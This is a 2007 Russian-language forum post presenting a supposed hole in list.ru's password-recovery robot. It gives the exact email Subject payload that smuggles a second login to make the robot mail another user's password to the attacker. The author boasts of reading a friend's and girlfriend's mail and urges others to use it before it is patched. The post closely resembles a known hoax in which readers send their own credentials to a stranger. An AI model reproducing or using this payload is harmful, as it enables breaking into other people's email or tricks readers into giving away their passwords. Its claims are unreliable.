DINAMIT | Дата: Суббота, 14.04.2007, 22:47 | Сообщение # 1 |
Рядовой
Группа: Пользователи
Сообщений: 1
Статус: Offline
| Я обнаружил эту дыру случайно. Оказывается, на list.ru зарегистрирован аккаунт info.pass@list.ru Но аккаунт этот не простой — он управляется роботом и занимается тем, что высылает пароли забывчивым пользователям. То есть, после того, как пользователь ввёл в специальную форму всю необходимую информацию для восстановления пароля (дата рождения и ответ на секретный вопрос), она посылается роботу, который генерирует новый пароль, который в свою очередь и отображается на сайте. Всё бы хорошо, но роботу можно послать запрос вида Subject:login=<e-mail человека который ломаем>&pass=&answer=;login=<ваш e-mail>&pass=<ваш пароль который вы знаете:)>&answer= указанный пароль подходит к логину и робот высылает пароль - но высылает пароль от e-mailа который нас интересует на наш ящик - вот в этом и вся фишка. Итак, надо взломать e-mail lozer@mail.ru наш e-mail hacker@yandex.ru а пароль ujuf-novy то запрос будет выглядеть следующим образом Subject:login=lozer@mail.ru&pass=&answer=;login=hacker@yand ex.ru&pass=ujuf-novy&answer= Всё! Теперь на ваш ящик придёт письмо примерно такого содержания: [09.11.2005 18:59 GSM+03] Forgotten bot Password requested for user lozer@mail.ru Рыжик P.S Это действительно работает!!! Так я узнал много нового о своем лучшем друге и подруге:) Единственно это то, что если сервер будет загружен, то ответ может придти только через пару дней (мне ответ пришел на следующий день вечером)- но лично мне главное чтобы ответ ПРИШЕЛ:) Пользуйтесь хацкеры пока админы эту дыру не залатали...
|
|
| |